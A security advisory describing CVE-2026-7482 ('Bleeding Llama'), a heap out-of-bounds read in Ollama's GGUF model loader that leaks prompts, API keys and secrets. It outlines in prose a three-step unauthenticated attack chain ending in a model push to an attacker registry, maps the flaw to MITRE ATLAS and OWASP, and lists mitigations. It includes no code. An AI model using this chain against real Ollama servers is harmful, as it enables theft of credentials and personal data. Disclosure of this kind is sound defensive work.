Bleeding Llama Flaw Exposes 300,000 Ollama Servers to Unauthenticated Data Theft

Overview

A critical vulnerability dubbed Bleeding Llama (CVE-2026-7482, CVSS 9.3) has been disclosed in Ollama, the widely used open-source framework for running large language models locally and in self-hosted environments. Discovered by Cyera, the flaw allows a remote, unauthenticated attacker to read sensitive data from the server’s heap memory — including prompts, chat history, environment variables, API keys, and secrets — and exfiltrate it to an attacker-controlled server. With an estimated 300,000 Ollama instances exposed on the public internet and no authentication enabled by default, the practical blast radius of this vulnerability is immediate and severe.

Technical Analysis

The vulnerability resides in Ollama’s GGUF model loader, the component responsible for ingesting model files in the GGUF format. The flaw is a classic heap out-of-bounds read: an attacker supplies a maliciously crafted GGUF file in which a tensor’s declared offset and size exceed the actual file length. When Ollama processes this file, it reads beyond the allocated heap buffer, accessing adjacent memory regions that may contain live runtime data.

The attack chain requires only three unauthenticated API calls:

Upload a crafted GGUF file via Ollama’s model import API.
Trigger processing of the file, causing the out-of-bounds read and capturing heap data into the resulting model blob.
Exfiltrate the blob using Ollama’s built-in model push feature, sending the memory-laced file to an attacker-controlled registry server.

Because Ollama listens on all network interfaces by default and ships without any authentication mechanism, every internet-accessible instance is exploitable without credentials. The memory regions exposed can include:

LLM prompt and message history
Environment variables (e.g., OPENAI_API_KEY, cloud provider tokens)
PHI, PII, and development secrets routed through the inference engine

Framework Mapping

Framework	Technique/Category	Rationale
MITRE ATLAS	AML.T0040 – ML Model Inference API Access	Attacker abuses Ollama’s unauthenticated API to trigger the vulnerable code path
MITRE ATLAS	AML.T0057 – LLM Data Leakage	Heap memory containing prompts and secrets is exfiltrated
MITRE ATLAS	AML.T0043 – Craft Adversarial Data	Maliciously crafted GGUF file is the attack vehicle
OWASP LLM	LLM06 – Sensitive Information Disclosure	Primary impact: API keys, PII, and prompts leaked from runtime memory
OWASP LLM	LLM05 – Supply Chain Vulnerabilities	GGUF model ingestion pipeline is the exploited trust boundary

Impact Assessment

The vulnerability affects all Ollama deployments prior to version 0.17.1 that are network-accessible without a firewall or authentication layer. The 300,000 figure represents publicly internet-facing instances; enterprise deployments on internal networks without segmentation are also at risk from insider threats or lateral movement. Depending on how Ollama is integrated, exploitation could expose:

Enterprise AI workflows: Employee chat history and routed tool outputs
Development environments: Hardcoded secrets and dev-time API tokens
Healthcare and legal contexts: PHI and PII passed through prompts
Multi-tenant platforms: Cross-tenant data leakage if Ollama is shared

Mitigation & Recommendations

Upgrade immediately to Ollama version 0.17.1, which patches CVE-2026-7482.
Restrict network access: Firewall Ollama’s API port (default: 11434) to localhost or trusted internal CIDRs only.
Deploy an authentication proxy (e.g., OAuth2 Proxy, nginx with mTLS) in front of any network-accessible Ollama instance.
Rotate all secrets: Assume any API keys, tokens, or credentials handled by an exposed Ollama instance are compromised.
Audit GGUF ingestion pipelines: Validate model file sources and apply integrity checks before loading third-party GGUF files.
Monitor for anomalous model push activity: Alert on outbound model push calls to unknown registries.

References

SecurityWeek – Critical Bug Could Expose 300,000 Ollama Deployments to Information Theft